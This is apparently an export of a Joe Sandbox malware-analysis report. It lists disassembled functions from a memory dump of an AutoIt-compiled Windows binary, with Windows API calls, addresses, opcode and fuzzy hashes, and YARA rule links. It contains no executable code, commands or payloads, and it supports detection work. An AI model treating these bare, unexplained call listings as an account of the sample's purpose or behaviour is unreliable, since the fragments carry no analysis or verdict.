                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 839392675-0
                                                      • Opcode ID: a9e5002efc15671027bc7b06c8db00354822f0b234b25b6cfca45097ccb7cbe2
                                                      • Instruction ID: 1d0a70b4de6dcc042010c5d7b60de715e14b111827b9057def8de8e8499f5f63
                                                      • Opcode Fuzzy Hash: a9e5002efc15671027bc7b06c8db00354822f0b234b25b6cfca45097ccb7cbe2
                                                      • Instruction Fuzzy Hash: EEF01D32641199BFE7219BA29C4DEAB7B7CEBC6B11F000169FA04D509096A11A0287B5
                                                      Function 00AC74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00AC74E5
                                                      • EnterCriticalSection.KERNEL32(?,?,00A71044,?,?), ref: 00AC74F6
                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,00A71044,?,?), ref: 00AC7503
                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00A71044,?,?), ref: 00AC7510
                                                        • Part of subcall function 00AC6ED7: CloseHandle.KERNEL32(00000000,?,00AC751D,?,00A71044,?,?), ref: 00AC6EE1
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00AC7523
                                                      • LeaveCriticalSection.KERNEL32(?,?,00A71044,?,?), ref: 00AC752A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 3495660284-0
                                                      • Opcode ID: a0e208247c90e67fb7f4a18c2ec83d1393fe48c44513947e93dd4494b191c190
                                                      • Instruction ID: 883a50cbb41d84e546d1f62d6cf5197b25c09ca365ae7616140022937c5d2747
                                                      • Opcode Fuzzy Hash: a0e208247c90e67fb7f4a18c2ec83d1393fe48c44513947e93dd4494b191c190
                                                      • Instruction Fuzzy Hash: 79F03A7A540652AFDB115BA4ED88AEA772AEF45702F020536F302990A0CB755902CB50
                                                      Function 00AB8E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AB8E7F
                                                      • UnloadUserProfile.USERENV(?,?), ref: 00AB8E8B
                                                      • CloseHandle.KERNEL32(?), ref: 00AB8E94
                                                      • CloseHandle.KERNEL32(?), ref: 00AB8E9C
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00AB8EA5
                                                      • HeapFree.KERNEL32(00000000), ref: 00AB8EAC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                      • String ID:
                                                      • API String ID: 146765662-0
                                                      • Opcode ID: 535c6cb4d54e4eea40ad6badd4076f10f6bdde9ca7be2f346c0ac3b956bea87b
                                                      • Instruction ID: 0af20b528b3af673997ef299d75502c5587177ec30ad16687cddecc01be84485
                                                      • Opcode Fuzzy Hash: 535c6cb4d54e4eea40ad6badd4076f10f6bdde9ca7be2f346c0ac3b956bea87b
                                                      • Instruction Fuzzy Hash: E9E0C236004046FFDA01AFE1EC4C90ABB69FB89322B108230F329890B0CB329462DB50
                                                      Function 00AD8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00AD8928
                                                      • CharUpperBuffW.USER32(?,?), ref: 00AD8A37
                                                      • VariantClear.OLEAUT32(?), ref: 00AD8BAF
                                                        • Part of subcall function 00AC7804: VariantInit.OLEAUT32(00000000), ref: 00AC7844
                                                        • Part of subcall function 00AC7804: VariantCopy.OLEAUT32(00000000,?), ref: 00AC784D
                                                        • Part of subcall function 00AC7804: VariantClear.OLEAUT32(00000000), ref: 00AC7859
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                      • API String ID: 4237274167-1221869570
                                                      • Opcode ID: ff5f0c3bc246593b41a1f524443f70d2f81635d9ffae5112c0b1d59e1c237f77
                                                      • Instruction ID: 335a7b1dabb07473fb9e96a7db2264bff8836ffc9909c02098ade2ed4ab2262c
                                                      • Opcode Fuzzy Hash: ff5f0c3bc246593b41a1f524443f70d2f81635d9ffae5112c0b1d59e1c237f77
                                                      • Instruction Fuzzy Hash: F1918D756083019FC710EF24C58496BBBF8EF89754F04896EF89A8B362DB31E945CB52
                                                      Function 00AC2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A7FEC6: _wcscpy.LIBCMT ref: 00A7FEE9
                                                      • _memset.LIBCMT ref: 00AC3077
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AC30A6
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AC3159
                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00AC3187
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                      • String ID: 0
                                                      • API String ID: 4152858687-4108050209
                                                      • Opcode ID: 2cdf85d517e47e526873ba74e3bb5b9b2fb250e6c7b827e1ecbe52b5206b4764
                                                      • Instruction ID: 7e5b6052536b20a44f2e3bfb3bee332b2048fa3a26fdb62d26f5ab74301420b9
                                                      • Opcode Fuzzy Hash: 2cdf85d517e47e526873ba74e3bb5b9b2fb250e6c7b827e1ecbe52b5206b4764
                                                      • Instruction Fuzzy Hash: CC51AF736083009EDF25AF28D945F6BB7E8EF45320F098A2DF895D6191DB70CE458B92
                                                      Function 00ABDA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00ABDAC5
                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00ABDAFB
                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00ABDB0C
                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00ABDB8E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                      • String ID: DllGetClassObject
                                                      • API String ID: 753597075-1075368562
                                                      • Opcode ID: 88ebadebe71e26ad3de1d49a387d42d2ca2fc512e3878263898762f1d30d3c1b
                                                      • Instruction ID: a7f2efb8b4fb3473f9c6b7015c46294d137ecdee76ae5fbbc634a6975f3e0e33
                                                      • Opcode Fuzzy Hash: 88ebadebe71e26ad3de1d49a387d42d2ca2fc512e3878263898762f1d30d3c1b
                                                      • Instruction Fuzzy Hash: 46415FB1600208EFDB15CF64C884ADABBBDEF44350F1581AEAD099F206E7B1D944CBA0
                                                      Function 00AC2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AC2CAF
                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00AC2CCB
                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00AC2D11
                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B26890,00000000), ref: 00AC2D5A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Menu$Delete$InfoItem_memset
                                                      • String ID: 0
                                                      • API String ID: 1173514356-4108050209
                                                      • Opcode ID: 5c2fe4d611a4eeafe5863ef46db69a9c64e3a550a6b146bc6f23020630601743
                                                      • Instruction ID: 7faa217d8364cbc6f873d04d194e834c681ec385b55de065745a4d6e7c88dfc1
                                                      • Opcode Fuzzy Hash: 5c2fe4d611a4eeafe5863ef46db69a9c64e3a550a6b146bc6f23020630601743
                                                      • Instruction Fuzzy Hash: 8A41B1702043419FDB21DF28C884F5BBBE8EF95320F15462DF96697291DB70E905CBA2
                                                      Function 00ADDAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00ADDAD9
                                                        • Part of subcall function 00A679AB: _memmove.LIBCMT ref: 00A679F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: BuffCharLower_memmove
                                                      • String ID: cdecl$none$stdcall$winapi
                                                      • API String ID: 3425801089-567219261
                                                      • Opcode ID: 18d70478554c5e926c692001d1c15b61d68757b7cea3e045e8596a4edff9c500
                                                      • Instruction ID: 6359d6cccfdd5eb37e2a04d92984ed97b67156f42b8e6c4685686f1fe189fb6b
                                                      • Opcode Fuzzy Hash: 18d70478554c5e926c692001d1c15b61d68757b7cea3e045e8596a4edff9c500
                                                      • Instruction Fuzzy Hash: 11319271600619AFCF10EFA4CD919EEB3B5FF15314B10866AE866AB7D1DB31A905CB80
                                                      Function 00AB9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                        • Part of subcall function 00ABB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ABB0E7
                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00AB93F6
                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00AB9409
                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00AB9439
                                                        • Part of subcall function 00A67D2C: _memmove.LIBCMT ref: 00A67D66
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$_memmove$ClassName
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 365058703-1403004172
                                                      • Opcode ID: 65f28685f97fda0016b451e122a486b44fce222afef2b23a3f606afe1dd2b277
                                                      • Instruction ID: 7915366d1ffdd7d6da7e3f123a3389ab454eee57a009bf97642c07447e641969
                                                      • Opcode Fuzzy Hash: 65f28685f97fda0016b451e122a486b44fce222afef2b23a3f606afe1dd2b277
                                                      • Instruction Fuzzy Hash: 5821E171900144BFDB14ABB0CC85CFFB7BCDF05360B108129FA25A72E2DB354E0A9620
                                                      Function 00AD1B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00AD1B40
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AD1B66
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00AD1B96
                                                      • InternetCloseHandle.WININET(00000000), ref: 00AD1BDD
                                                        • Part of subcall function 00AD2777: GetLastError.KERNEL32(?,?,00AD1B0B,00000000,00000000,00000001), ref: 00AD278C
                                                        • Part of subcall function 00AD2777: SetEvent.KERNEL32(?,?,00AD1B0B,00000000,00000000,00000001), ref: 00AD27A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                      • String ID:
                                                      • API String ID: 3113390036-3916222277
                                                      • Opcode ID: b3b250a854126caad9eccd90ef13b6b65e4dee46d1db690fd42fe45458517685
                                                      • Instruction ID: a926dde1ef4416f35a3ad1dc0e975379dbf5c525d18ceaeb70125c39375e661d
                                                      • Opcode Fuzzy Hash: b3b250a854126caad9eccd90ef13b6b65e4dee46d1db690fd42fe45458517685
                                                      • Instruction Fuzzy Hash: 19219FB1600208BFEB21DF609CC5EBF76FDEB89B44F10412BF506A6340EA309D069761
                                                      Function 00AE6656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A61D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A61D73
                                                        • Part of subcall function 00A61D35: GetStockObject.GDI32(00000011), ref: 00A61D87
                                                        • Part of subcall function 00A61D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A61D91
                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00AE66D0
                                                      • LoadLibraryW.KERNEL32(?), ref: 00AE66D7
                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00AE66EC
                                                      • DestroyWindow.USER32(?), ref: 00AE66F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                      • String ID: SysAnimate32
                                                      • API String ID: 4146253029-1011021900
                                                      • Opcode ID: c1364c644d1e01330e53db2ef3de2e7d0246a29790ffdbde3d8153d2c99806a4
                                                      • Instruction ID: 608771253d6d1c942d316bd5d0c083d83c15116a008b345ac7b062567296d720
                                                      • Opcode Fuzzy Hash: c1364c644d1e01330e53db2ef3de2e7d0246a29790ffdbde3d8153d2c99806a4
                                                      • Instruction Fuzzy Hash: 1221A171110286AFEF148F65EC80EBB37ADEF693A8F104A29F910961A0D771DC519760
                                                      Function 00AC703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00AC705E
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AC7091
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00AC70A3
                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00AC70DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      • Opcode ID: 013aa6041fd2ff77345b032d11db13490345e9de105b39c89f27867c9bb774e1
                                                      • Instruction ID: 60035d7c548691bc094feaac7769c707f8c373165e17ec995ce5bfa6ac8d3042
                                                      • Opcode Fuzzy Hash: 013aa6041fd2ff77345b032d11db13490345e9de105b39c89f27867c9bb774e1
                                                      • Instruction Fuzzy Hash: 9F217C74504209ABDB209F68DC45F9E7BB8AF54721F218A2DFDA0D72D0EB7098408B50
                                                      Function 00AC710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00AC712B
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AC715D
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00AC716E
                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00AC71A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      • Opcode ID: 559b7ee1421a7da24865355ca2076dee5c8ef808b8a0dd4a66497b2b3918d125
                                                      • Instruction ID: cd15f2b7b86d2d73e95eea12013383f2eea55b913089a84c90079e23967888f0
                                                      • Opcode Fuzzy Hash: 559b7ee1421a7da24865355ca2076dee5c8ef808b8a0dd4a66497b2b3918d125
                                                      • Instruction Fuzzy Hash: 872171755042099FDB209F689C44F9EB7E8AF55720F25071DFDA1D72E0DB70A8418F51
                                                      Function 00ACAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00ACAEBF
                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00ACAF13
                                                      • __swprintf.LIBCMT ref: 00ACAF2C
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,00AEF910), ref: 00ACAF6A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                      • String ID: %lu
                                                      • API String ID: 3164766367-685833217
                                                      • Opcode ID: c3e99750020acfee1e80ac26a807a04152704f39216ba33f8b839a8df2cf4916
                                                      • Instruction ID: b20c27d620fb1d358907f6ae28bb7ff5bb773edd360ca98beb9e7d5817fa9bde
                                                      • Opcode Fuzzy Hash: c3e99750020acfee1e80ac26a807a04152704f39216ba33f8b839a8df2cf4916
                                                      • Instruction Fuzzy Hash: AB214135A00149AFCB10EFA5C985EEE7BB8EF89704B104069F909EB251DB31EA41CB61
                                                      Function 00ABA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A67D2C: _memmove.LIBCMT ref: 00A67D66
                                                        • Part of subcall function 00ABA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ABA399
                                                        • Part of subcall function 00ABA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ABA3AC
                                                        • Part of subcall function 00ABA37C: GetCurrentThreadId.KERNEL32 ref: 00ABA3B3
                                                        • Part of subcall function 00ABA37C: AttachThreadInput.USER32(00000000), ref: 00ABA3BA
                                                      • GetFocus.USER32 ref: 00ABA554
                                                        • Part of subcall function 00ABA3C5: GetParent.USER32(?), ref: 00ABA3D3
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00ABA59D
                                                      • EnumChildWindows.USER32(?,00ABA615), ref: 00ABA5C5
                                                      • __swprintf.LIBCMT ref: 00ABA5DF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                      • String ID: %s%d
                                                      • API String ID: 1941087503-1110647743
